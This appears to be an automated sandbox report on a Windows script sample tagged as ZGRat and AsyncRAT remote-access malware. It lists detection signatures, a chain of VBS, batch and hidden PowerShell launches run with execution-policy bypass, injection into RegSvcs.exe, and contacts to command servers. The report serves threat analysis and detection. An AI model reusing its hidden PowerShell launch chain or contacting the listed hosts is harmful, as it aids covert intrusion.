Malware Analysis Report

2025-06-16 02:15

Sample ID 240125-nn2hksffbq
Target f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3)
SHA256 f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db
Tags
zgrat rat asyncrat default
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db

Threat Level: Known bad

The file f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3) was found to be: Known bad.

Malicious Activity Summary

zgrat rat asyncrat default

Detect ZGRat V1

ZGRat

AsyncRat

Async RAT payload

Blocklisted process makes network request

Checks computer location settings

Drops file in System32 directory

Suspicious use of SetThreadContext

Enumerates physical storage devices

Suspicious use of SetWindowsHookEx

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Uses Task Scheduler COM API

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-01-25 11:33

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-01-25 11:33

Reported

2024-01-25 11:36

Platform

win7-20231215-en

Max time kernel

140s

Max time network

120s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

Signatures

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\system32\taskeng.exe

taskeng.exe {A605EA56-7FCE-4A22-BA4B-B804128017D9} S-1-5-21-3818056530-936619650-3554021955-1000:SFVRQGEO\Admin:Interactive:[1]

C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\System32\cmd.exe

cmd /c ""C:\Users\Public\hich.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

Network

Country Destination Domain Proto
FR 185.81.157.103:80 185.81.157.103 tcp
FR 185.81.157.103:80 185.81.157.103 tcp

Files

memory/2284-7-0x000000001B720000-0x000000001BA02000-memory.dmp

memory/2284-8-0x0000000001E80000-0x0000000001E88000-memory.dmp

memory/2284-9-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

memory/2284-12-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2284-11-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2284-10-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2284-13-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

memory/2284-17-0x000007FEF5B90000-0x000007FEF652D000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 615a7b1b6cd63e8be3b318138ff66688
SHA1 f0fb5b11ff93a7448a158b2345737fd336c6893d
SHA256 b04be3f8c76d1e49c8f94d01bf8567c5b35295031c9edf676989d0b489d09a1c
SHA512 19d30cb7e4c6d1412ca22383fd3de296eff42a17118bf9a05e9acac5cb974bf7f7a709437cb6a7b62679f95710519d30af850729f60f829aebde6bad8cc439d0

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9G1B1EYCVQY3966BXDZH.temp

MD5 e32cad1ab4c8a3ad44873e572ee4dc01
SHA1 d0bf141a980383e56b523ccf0203ae37151ab10f
SHA256 ed659d481dde23fd44f7a4a9c3c44cc27151e472f56652ab6053a3cf0c48b8d6
SHA512 aa0cff138df661064838132e286180d365d4f5f58c46879efddffada1cf7d4322f3d1d4e0622d4b873b02713d06a85bb26a1c8b1673595435e2f68366523e48c

memory/2184-25-0x000000001B6C0000-0x000000001B9A2000-memory.dmp

memory/2184-27-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-28-0x00000000022A0000-0x00000000022A8000-memory.dmp

memory/2184-31-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-30-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-29-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

memory/2184-26-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

C:\Users\Public\hich.ps1

MD5 7cc8cf044a1603d177667066b558742b
SHA1 822b16d67f89023109a2fb8a091c7949f7fb3bc4
SHA256 3afa667e8bb93d5f1336e4e4ffdaa5c31508b3ff4d06309931f0a95121636d19
SHA512 28bd26a588b874196e79b1e993ec9116fe0c3777c91630b5154fa745b378719726805162fcab9bac2b76cea30f20bc119d51eed9d4e95bd72cae68283b6ad175

memory/2184-32-0x0000000002DB0000-0x0000000002E30000-memory.dmp

memory/2184-34-0x0000000002AA0000-0x0000000002AD4000-memory.dmp

memory/2184-35-0x000007FEF51F0000-0x000007FEF5B8D000-memory.dmp

memory/2184-36-0x0000000002DB0000-0x0000000002E30000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-01-25 11:33

Reported

2024-01-25 11:36

Platform

win10v2004-20231222-en

Max time kernel

144s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

Signatures

AsyncRat

rat asyncrat

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A

ZGRat

rat zgrat

Async RAT payload

rat

Description Indicator Process Target
N/A N/A N/A N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1168293393-3419776239-306423207-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4800 set thread context of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3984 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3984 wrote to memory of 2056 N/A C:\Windows\System32\WScript.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3748 wrote to memory of 444 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 3748 wrote to memory of 444 N/A C:\Windows\System32\WScript.exe C:\Windows\system32\cmd.exe
PID 444 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 444 wrote to memory of 4800 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
PID 4800 wrote to memory of 3484 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\f4accddf3bacbc70b54763800af4d7f47a427edd249ba1066ffcadb1458c03db (3).wsf"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe


C:\Windows\System32\WScript.exe

C:\Windows\System32\WScript.exe "C:\Users\Public\hich.vbs"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Public\hich.bat" "

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\hich.ps1'"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country Destination Domain Proto
FR 185.81.157.103:80 185.81.157.103 tcp
US 8.8.8.8:53 28.118.140.52.in-addr.arpa udp
US 8.8.8.8:53 103.157.81.185.in-addr.arpa udp
FR 185.81.157.103:80 185.81.157.103 tcp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 138.91.171.81:80 N/A tcp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 18.134.221.88.in-addr.arpa udp
FR 185.81.157.183:9696 N/A tcp
FR 185.81.157.183:9696 N/A tcp

Files

memory/2056-5-0x00000210F1F70000-0x00000210F1F92000-memory.dmp

memory/2056-6-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

memory/2056-7-0x00000210F2010000-0x00000210F2020000-memory.dmp

memory/2056-8-0x00000210F2010000-0x00000210F2020000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m5gokor4.mpf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2056-20-0x00000210F2010000-0x00000210F2020000-memory.dmp

memory/2056-23-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

C:\Users\Public\hich.vbs

MD5 741b5b0a474f0e0cd28fd880f68723c0
SHA1 4de5489c4e56882514b3ab432048200eae65f90d
SHA256 f7edde68b4f783fe07a6cb0d12ffc76b04a9d81747cff32eed06c7caee5f7b23
SHA512 3783759fc24189ddb02ab9bd9888f4fe458ed378c6079d3fbd28af6fc34200d5f45ccd7e1c4beca90d9afe9d3bb29f7f20128c7b0a958c2c8a1a1ce8e9cc2f54

C:\Users\Public\hich.bat

MD5 6c8a34a94e068b809145df09acbe153c
SHA1 0ec5c6964c6ccc949af47297eb9794f8f1ee4724
SHA256 c683e03275b7f8d2031a42bdde2b95e2f46e8811004205a092e87de4bae5d003
SHA512 41431bb242a1b5848b8c4ab197dc6181db6f203bb26de68f492b99e876b63b73c6497fb996b0341045b1babd1c92be3346de116fa3699017d58e1d1199bfd805

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 2f57fde6b33e89a63cf0dfdd6e60a351
SHA1 445bf1b07223a04f8a159581a3d37d630273010f
SHA256 3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55
SHA512 42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

memory/4800-27-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

memory/4800-28-0x0000021DEC520000-0x0000021DEC530000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 aa8efa56e1e40374bbd21e0e469dceb7
SHA1 33a592799d4898c6efdd29e132f2f76ec51dbc08
SHA256 25eb4f899ae8f90b66b9342781456700d1af487f6f302fe5a727328b026f6bdf
SHA512 ad6de575b83db36b239317e4c46a1eaeb0383d5909a12b69ee2b38798c2b5cb0d19b464f5689037501d20592d92c4d3d84f0e49fdb1c0648b6593481a183f096

C:\Users\Public\hich.ps1

MD5 8469f5b76df0f510fe02b1eab0f57226
SHA1 7ad6c79dc42aafd7b813353c8bdcb1204c376621
SHA256 a7247306f746e668360268472d038a8848d49645970ca7501d50cc0f700db279
SHA512 526280cb8cc15bae99a02c6f6a0ca26564f7eb657f610cd1579d953b584705b9bca8d0a7b6902e0bd0234912acdbb1b74bf4adf8aa7c6e49b6876b8ae82fe0b4

memory/4800-40-0x0000021DEE6A0000-0x0000021DEE6D4000-memory.dmp

memory/3484-42-0x0000000000400000-0x0000000000416000-memory.dmp

memory/4800-41-0x0000021DEC520000-0x0000021DEC530000-memory.dmp

memory/4800-44-0x00007FFB99AA0000-0x00007FFB9A561000-memory.dmp

memory/3484-45-0x0000000074E00000-0x00000000755B0000-memory.dmp

memory/3484-46-0x0000000003200000-0x0000000003210000-memory.dmp

memory/3484-47-0x0000000005FC0000-0x0000000006564000-memory.dmp

memory/3484-48-0x0000000005C00000-0x0000000005C92000-memory.dmp

memory/3484-49-0x0000000005BF0000-0x0000000005BFA000-memory.dmp